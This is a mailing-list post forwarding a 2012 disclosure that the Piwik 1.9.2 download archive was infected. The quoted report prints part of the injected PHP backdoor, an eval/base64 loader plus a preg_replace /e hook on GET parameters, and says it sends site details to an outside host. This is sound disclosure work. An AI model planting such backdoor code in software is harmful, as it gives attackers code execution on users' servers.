Fwd: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
Hans Fr. Nordhaug
hans at nordhaug.priv.no
Tue Nov 27 13:22:09 UTC 2012
Hi,
I just noticed http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/
before I got this message.
I downloaded http://builds.piwik.org/piwik-1.9.2.tar.gz
and compared it to my local copy of 1.9.2, and all files are unchanged.
It's just the archiving that changed the file size. The Piwik build
manager is a little bit sloppy ...
Regards,
Hans
* Ruslan Mahmatkhanov <cvs-src at yandex.ru> [2012-11-27]:
> => piwik-1.9.2.tar.gz doesn't seem to exist in /usr/ports/distfiles/.
> => Attempting to fetch http://builds.piwik.org/piwik-1.9.2.tar.gz
> fetch: http://builds.piwik.org/piwik-1.9.2.tar.gz: size mismatch:
> expected 5676196, actual 5676058
>
>
>
> -------- Original message --------
> Subject: [Full-disclosure] Possible infection of Piwik 1.9.2 download
> archive
> Date: Mon, 26 Nov 2012 21:17:57 +0100
> From: Maximilian Grobecker <max at grobecker-wtal.de>
> To: full-disclosure at lists.grok.org.uk
>
> Hi,
>
> this evening I downloaded a fresh archive of Piwik 1.9.2 and found this
> code at the bottom of the /piwik/core/Loader.php file:
>
> (Just a short snippet)
> -----------snip-------------
> <?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) {
> preg_replace("/(.+)/e", $_GET['g'], 'dwm'); exit;
> }
> if (file_exists(dirname(__FILE__)."/lic.log")) exit;
> eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s
>
> [.......]
>
> -----------/snip-------------
>
>
> I decoded some parts of this code and found what it does:
> It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and
> the request URI via POST to http://prostoivse.com/x.php and creates a
> file named "lic.log" in the same directory.
> As long as this file exists it seems that no further POST requests are made.
>
> At the moment I'm trying to figure out the further sense of this code,
> but it seems that there might also be some kind of backdoor (because of
> the use of $_GET).
>
> The file in the downloadable archive is dated at
> Nov 26, 2012 / 18:42 UTC.
>
> From forums I know that some people downloaded the archive earlier this
> day and don't have this code inside their files.
>
> At the moment (at 8:08 PM UTC) the archive is downloadable at the
> original Piwik web site with this obfuscated code.
>
> I contacted the developers and managers of Piwik a few minutes ago about
> this.
>
>
> --
> Greetings from Wuppertal, Germany
>
> Max Grobecker
More information about the freebsd-ports
mailing list